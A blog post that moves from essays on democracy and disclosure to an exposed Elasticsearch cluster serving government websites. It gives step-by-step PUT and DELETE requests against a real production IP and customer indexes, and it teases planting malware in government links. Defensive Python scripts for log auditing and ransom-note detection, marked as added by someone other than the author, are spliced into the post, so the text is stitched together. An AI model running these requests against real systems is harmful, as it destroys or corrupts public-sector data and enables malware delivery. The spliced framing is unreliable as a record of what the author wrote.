I. Democratic Faith

Democracy tests. Another way to think of it is "something that doesn't work in theory but performs quite well in practice".

Certain periods in history see democracies display what look like incredible bouts of incompetence: sleepwalking from crisis to crisis, or going in circles. This is less frustrating if it is viewed instead as the product of a complex set of historical and social forces that simply aren't that well understood, yet seem to be indispensable to democracies that function over the long term.

Peter Turchin has written some about this, and I will quickly cover some of his theories here. Authoritarian governments are renowned for their swiftness and for the demanding pace at which their institutions seem to work. Their ability to seize the future and build the dreams of tomorrow has always captured the imagination. Fascism has been associated with a sort of elan, innovation, and theatrical flair. Film as propaganda, politicians landing in planes to deliver speeches directly, and the latest fashion were all its domain. Yet behind all of the theatrics are massive projects (authoritarian governments also tend towards gigantism) that standardize far too quickly on unproven technology. That technology is not the best available, and the choice is usually later regarded widely as disastrous. The result is a society that has built the greatest version of a technology the world has moved on from. The USSR was derided as having built "the world's finest 19th century economy" after the scope of its steel plants in Magnitogorsk was revealed in the late 40s.

To harp on this one more time, I have pasted below a quote from FDR from the final weeks of the 1940 campaign. It's on a page torn out of a book I can no longer remember, but the words are hard to forget:

"The surge of events abroad has made some few doubters among us...[yet] all we have known of the glories of democracy, its freedom, its efficiency as a mode of living, its ability to meet the aspirations of the common man--all these are merely an introduction to the greater story of a more glorious future."

Part of this faith that I speak of is in respecting the laws of democracy. Legal paradigms eventually fall apart (about every 40 years seems to be the historical average), and during these moments when the law has clearly failed but not yet changed, you see acts of civil disobedience. These are people gambling that breaking the law today as a protest is of no consequence if it serves to change the law tomorrow or to reveal a wider injustice. It is a gamble, no doubt, and the acts of civil disobedience need to be modest as well.

I also think that if you assume the spirit and heart of most laws in a democracy are good, or at least a decent attempt at being good, following them is no great burden, and civil disobedience is not required. This has become even more true as business leaders, I've noticed, have become very lazy about following the law. As people have become so reluctant to challenge them, they no longer invest in teams of lawyers and bulletproof legal structures. They simply don't follow the law. It is sad to see. When complying with the law is very simple and produces enormous common good for all, noncompliance borders on the tragic and absurd. Sometimes the only thing standing between them and a safer society is a single checkbox that they don't know to click and would probably refuse to click if you told them.

III. The Failure of Self-Regulation

I've talked a little about my views on responsible disclosure. It effectively makes zero difference whether it is done or not, and it is a failed idea infused to the core with the ideals of neoliberalism. That being said, except in cases of espionage, I think following some level of responsible disclosure is important. This is only for the sake of respecting the democratic nature of our institutions, and not, I would say, for protecting people (which is done in an entirely different way from responsible disclosure and will be elaborated on in a separate post).

So, with regard to what I elaborate on below, Granicus has already been notified 3 separate times over the last 8 weeks. It might actually be more than that, but that is the floor from the tweets and emails I quickly checked before making this post. This includes directly tweeting at their CMO about the issue in alarming, yet still safely vague, language. A separate article in a major state newspaper (a United States "state", to be clear) will detail these findings in simpler language in two weeks, but will also go into more detail on a few points.

IV. Important Cyber Stuff

  1. Granicus has accidentally left open to the world a group of important database servers that could harm hundreds of millions given the current world crisis.
  2. Most of their customer data can be deleted by downloading a free iOS/Android app and running a couple of commands.
  3. This would impact 1,702 government organizations. Some are local towns, some are state orgs, and others are the CSRC at NIST, House Armed Services Committee, and the USDA.
  4. The cluster has already been maliciously accessed before.

V. But Who Cares, Unless This Data is Super Private?

Good point. So first, a small amount is private, maybe somewhere around 2-3% of millions of records. This is a minor, but not insignificant, amount: closed-door meetings, emergency group calls discussing the response to some employee lawsuit, etc. Second, it is not the privacy aspect that is of concern here. The acronym CIA is often used in security: Confidentiality/Integrity/Availability. Obviously, by deleting or taking the cluster offline, we certainly impact the availability of a lot of government services. That is important...but still, how often does one go to a government website? More important, but not really distinguishable from all the other breaches one hears about.

So finally we come to integrity. What if it were possible to swap out millions of links on government websites right now with whatever you wanted? Users are clicking on these links every day. What if instead they downloaded rootkits directly to their computers? What if many of these rootkits landed directly on government computers and in government networks? Could you do this to all 1,700 customers at the same time? Could you do it without Granicus noticing?

VI. The Screenshots:

The below screenshots and instructions give a general overview of the level of access to the main Granicus database cluster.

a). Add Whatever Data You Want to Granicus's Main Production Server ...


1. Download the app HTTPBot if on iOS. All steps are possible with minor adjustments on Android, Linux, Windows, Mac, etc.

2. Open the app, click on "History", and then click the + sign in the bottom right corner. You will arrive at this screen.

3. In the request box, change the GET (in blue in the last screenshot) to PUT (orange in this screenshot). Just click on GET and a select menu will open where you can choose PUT.

4. In the request box that now says PUT place http://54.225.102.156:8080/malicioussoftwareupload. Hit send.


5. A success message should follow.

b). Delete Whatever Data You Want from Granicus's Main Production Server



6. Now delete your data by changing the box that previously said PUT to DEL for "delete". You should now realize that you could actually call DEL on any existing "index" (think of them as mini-databases inside of this one really giant database) that Granicus has. Each "index" represents a customer. So a portion of HHS could have been taken offline by appending "hhs.granicus.com", or the US Senate via "senate.granicus.com", to the end of your URL instead of "malicioussoftwaressstuff".
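The two subsections above show that, on an exposed cluster, a plain HTTP PUT creates data and a DELETE on an index name removes a customer's whole dataset. From the defender's side, the thing to watch for is exactly those methods arriving from outside the application tier. The following Python script is an added example, not code from the post or from Granicus: it parses reverse-proxy access lines in front of an Elasticsearch HTTP port and flags write and destructive requests by source network. The log lines, the trusted network `10.0.0.0/8`, the index names `hhs.example.gov` and `senate.example.gov`, and the `_cluster/nodes/_shutdown` path (the node-shutdown endpoint of old 1.x clusters, which is assumed here to be what the Elasticsearch Head "Shutdown" action called on those versions) are all constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

# Combined-log-style access lines from a reverse proxy in front of an
# Elasticsearch HTTP port. These lines are constructed for this example and are
# not records from the cluster described in the post.
SAMPLE_LOG = """\
10.0.5.12 - - [10/Apr/2020:14:02:11 +0000] "GET /_cluster/health HTTP/1.1" 200 512
203.0.113.77 - - [10/Apr/2020:14:02:40 +0000] "PUT /malicioussoftwareupload HTTP/1.1" 200 118
203.0.113.77 - - [10/Apr/2020:14:03:02 +0000] "DELETE /senate.example.gov HTTP/1.1" 200 64
10.0.5.12 - - [10/Apr/2020:14:03:30 +0000] "POST /hhs.example.gov/_doc HTTP/1.1" 201 220
198.51.100.9 - - [10/Apr/2020:14:04:01 +0000] "POST /_cluster/nodes/_shutdown HTTP/1.1" 200 30
10.0.5.12 - - [10/Apr/2020:14:04:10 +0000] "GET /hhs.example.gov/_search?q=* HTTP/1.1" 200 9001
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class Request:
    ip: str
    ts: str
    method: str
    path: str
    status: int


@dataclass
class Finding:
    severity: str   # "high" or "critical"
    reason: str
    request: Request


def parse_line(line):
    """Parse one access-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return Request(m["ip"], m["ts"], m["method"], m["path"], int(m["status"]))


def classify(req):
    """Label a request 'read', 'write' or 'destructive' from its method and path."""
    segments = [s for s in req.path.split("?", 1)[0].split("/") if s]
    # /_cluster/nodes/_shutdown is the node-shutdown endpoint of old (1.x)
    # clusters (assumed here to be what the Head plugin's Shutdown action used).
    if "_shutdown" in segments:
        return "destructive"
    # DELETE with a single path segment removes a whole index (or /_all).
    if req.method == "DELETE" and len(segments) == 1:
        return "destructive"
    if req.method in ("PUT", "POST", "DELETE"):
        return "write"
    return "read"


def audit_log(text, trusted_cidrs):
    """Return findings for write/destructive requests, judged by source network.

    trusted_cidrs lists the networks (as strings) that legitimately write to the
    cluster, e.g. the application servers. Every other source is untrusted.
    Failed requests (4xx/5xx) are still reported: an attempt is worth seeing.
    """
    trusted_nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    findings = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        kind = classify(req)
        if kind == "read":
            continue
        trusted = any(ipaddress.ip_address(req.ip) in n for n in trusted_nets)
        if kind == "destructive":
            # Index deletion or node shutdown is never routine, even from inside.
            sev = "high" if trusted else "critical"
            findings.append(Finding(sev, f"destructive {req.method} {req.path}", req))
        elif not trusted:
            findings.append(Finding("high", f"unauthenticated write from {req.ip}", req))
    return findings


if __name__ == "__main__":
    for f in audit_log(SAMPLE_LOG, ["10.0.0.0/8"]):
        print(f"{f.severity:8} {f.request.ip:15} {f.reason}")
```

On the sample input the script reports the external PUT as high and the external index DELETE and node shutdown as critical, while the internal POST from the application tier is left alone. A cluster that is bound to a private interface and fronted by authentication would never produce the first three lines at all, which is the real fix; the audit is what tells you whether that fix is actually in place.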

c). Replace Links on Production US Government Websites with Malicious Malware
I'm going to detail how to do this almost exactly, with the exception of the final step. See the post immediately following this one for step-by-step instructions. For now, a few more screenshots showing the damage you could wreak are below. Please note I am using the free Chrome extension Elasticsearch Head.

1. Production nodes that make up the production cluster. Note the dropdown box for Actions>>>Shutdown under the first node. All it takes is a click.



2. These are all of the indexes (mini databases that each represent a government agency) displayed with the Chrome extension mentioned above. Notice how I can delete them.


3. BinaryEdge, an incredible tool, revealing the full nature of the breach and all of the exposed production nodes:


4. Granicus, it appears, has been hacked before. There are other clues in their database, but for now I will show this small ransomware note. If you've looked at Elasticsearch clusters that allow write access, as Granicus's does, for long enough, you've 100% seen things like this. Usually they are just automated internet scanners that seek out open clusters (they can spot them within about 60 minutes now) and immediately lock down all data until you pay up. Customers most of the time forget to remove the ransom notes. You can see that a record of such a note was left here as a "type" specification in the Elasticsearch mapping API.
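Because the note survives as an index or type name in the mapping API, a defender can look for it the same way the author did, only systematically. The Python below is an added example, not the post's own code: it walks a `GET /_mapping` response and flags any (index, type) pair whose index name, type name or field names carry the tokens that automated ransom scripts leave behind. The mapping document is constructed for the example (index names `hhs.example.gov`, `warning`, `senate.example.gov`; type and field names likewise), and the token lists are an assumption based on commonly seen notes, not a complete signature set. It also handles the typeless 7.x layout, where `properties` sits directly under `mappings`, which goes beyond the pre-7.x typed layout the post refers to.

```python
import re

# A trimmed, constructed response in the shape of GET /_mapping from a
# pre-7.x Elasticsearch cluster (index -> mappings -> type -> properties).
# All names below are made up for this example.
SAMPLE_MAPPING = {
    "hhs.example.gov": {
        "mappings": {
            "meeting": {"properties": {"title": {"type": "string"}, "date": {"type": "date"}}}
        }
    },
    "warning": {
        "mappings": {
            "readme": {"properties": {"message": {"type": "string"}}}
        }
    },
    "senate.example.gov": {
        "mappings": {
            "event": {"properties": {"title": {"type": "string"}}},
            "read_me_to_recover_data": {
                "properties": {"btc_address": {"type": "string"}, "message": {"type": "string"}}
            },
        }
    },
}

# Tokens that recur in the note indexes/types left by automated open-cluster
# ransom scripts (assumed list; extend from your own incident history).
NOTE_NAME_RE = re.compile(r"read.?me|please.?read|warning|recover|ransom|bitcoin|btc|wallet", re.I)
NOTE_FIELD_RE = re.compile(r"btc|bitcoin|wallet|ransom|contact.?email", re.I)


def _iter_types(mappings):
    """Yield (type_name, type_body) for both typed (pre-7.x) and typeless
    (7.x, 'properties' directly under 'mappings') layouts."""
    if "properties" in mappings:
        yield "_doc", mappings
        return
    for type_name, body in mappings.items():
        if isinstance(body, dict):
            yield type_name, body


def find_ransom_artifacts(mapping):
    """Return one record per (index, type) that carries ransom-note indicators."""
    findings = []
    for index, index_body in mapping.items():
        for type_name, type_body in _iter_types(index_body.get("mappings", {})):
            indicators = []
            if NOTE_NAME_RE.search(index):
                indicators.append(f"index name '{index}'")
            if NOTE_NAME_RE.search(type_name):
                indicators.append(f"type name '{type_name}'")
            for field in type_body.get("properties", {}):
                if NOTE_FIELD_RE.search(field):
                    indicators.append(f"field '{field}'")
            if indicators:
                findings.append({"index": index, "type": type_name, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for hit in find_ransom_artifacts(SAMPLE_MAPPING):
        print(f"{hit['index']}/{hit['type']}: {', '.join(hit['indicators'])}")
```

Run against a real cluster, you would feed the function the parsed JSON of `GET /_mapping` (fetched with whatever authenticated client you already use). A hit is evidence that the cluster was reachable and writable by strangers at some point, which matters more than the note itself: the note is the scanner's calling card, and the question it raises is what else was read, changed or deleted while the door was open.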